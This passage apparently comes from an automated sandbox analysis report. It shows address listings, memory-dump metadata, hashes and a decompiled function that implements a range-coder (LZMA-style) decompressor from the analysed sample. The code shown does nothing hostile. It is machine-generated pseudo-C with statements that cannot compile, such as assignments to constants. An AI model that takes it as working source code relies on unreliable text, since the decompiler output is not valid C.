                                                        0x00406e36
                                                        0x00406e39
                                                        0x00406e3b
                                                        0x00406e3e
                                                        0x00406e41
                                                        0x00406e41
                                                        0x00406e44
                                                        0x00406e44
                                                        0x00406e47
                                                        0x00406e4e
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00000000
                                                        0x00406e50
                                                        0x00000000
                                                        0x00406e50
                                                        0x00406e4e
                                                        0x00406dd4
                                                        0x00406dd7
                                                        0x00406dd9
                                                        0x00406ddc
                                                        0x00000000
                                                        0x00000000
                                                        0x00406b3b
                                                        0x00406b3b
                                                        0x00406b3f
                                                        0x00407184
                                                        0x00000000
                                                        0x00407184
                                                        0x00406b45
                                                        0x00406b48
                                                        0x00406b4b
                                                        0x00406b4e
                                                        0x00406b51
                                                        0x00406b54
                                                        0x00406b57
                                                        0x00406b59
                                                        0x00406b5c
                                                        0x00406b5f
                                                        0x00406b62
                                                        0x00406b64
                                                        0x00406b64
                                                        0x00406b64
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f43
                                                        0x00406f43
                                                        0x00406f43
                                                        0x00406f47
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f4d
                                                        0x00406f50
                                                        0x00406f53
                                                        0x00406f56
                                                        0x00406f58
                                                        0x00406f58
                                                        0x00406f58
                                                        0x00406f5b
                                                        0x00406f5e
                                                        0x00406f61
                                                        0x00406f64
                                                        0x00406f67
                                                        0x00406f6a
                                                        0x00406f6b
                                                        0x00406f6d
                                                        0x00406f6d
                                                        0x00406f6d
                                                        0x00406f70
                                                        0x00406f73
                                                        0x00406f76
                                                        0x00406f79
                                                        0x00406f7c
                                                        0x00406f80
                                                        0x00406f82
                                                        0x00406f85
                                                        0x00000000
                                                        0x00406f87
                                                        0x00000000
                                                        0x00406f87
                                                        0x00406f85
                                                        0x004071ba
                                                        0x00000000
                                                        0x00000000
                                                        0x004067e9

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 938fb70cab063128a157af1098290c857e69407ac2924c0a6b94e5f41d13b3bc
                                                        • Instruction ID: 030bbf204142f55243dad992a5db991e5d63a74ebaef12f83509f41b37c8d212
                                                        • Opcode Fuzzy Hash: 938fb70cab063128a157af1098290c857e69407ac2924c0a6b94e5f41d13b3bc
                                                        • Instruction Fuzzy Hash: BC813371E04228DFDF24CFA8C8447ADBBB1FB44305F25816AD856BB281C738A986DF55
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004067A7 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 98%
                                                        			E004067A7(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004071F9))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8); // executed
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12); // executed
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                                                        0x004067b7
                                                        0x004067be
                                                        0x004067c4
                                                        0x004067ca
                                                        0x00000000
                                                        0x004067ce
                                                        0x004067da
                                                        0x004067da
                                                        0x004067da
                                                        0x004067e3
                                                        0x00000000
                                                        0x00000000
                                                        0x004067e9
                                                        0x00000000
                                                        0x004067f0
                                                        0x004067f4
                                                        0x00000000
                                                        0x00000000
                                                        0x004067fd
                                                        0x00406800
                                                        0x00406803
                                                        0x00406805
                                                        0x00406807
                                                        0x00000000
                                                        0x00000000
                                                        0x0040680d
                                                        0x00406810
                                                        0x00406812
                                                        0x00406813
                                                        0x00406816
                                                        0x00406818
                                                        0x00406819
                                                        0x0040681b
                                                        0x0040681e
                                                        0x00406823
                                                        0x00406828
                                                        0x00406831
                                                        0x00406844
                                                        0x00406847
                                                        0x00406850
                                                        0x00406853
                                                        0x0040687b
                                                        0x0040687b
                                                        0x0040687d
                                                        0x0040688b
                                                        0x0040688b
                                                        0x0040688f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0040687f
                                                        0x0040687f
                                                        0x00406882
                                                        0x00406882
                                                        0x00406883
                                                        0x00406883
                                                        0x00000000
                                                        0x0040687f
                                                        0x00406855
                                                        0x00406859
                                                        0x0040685e
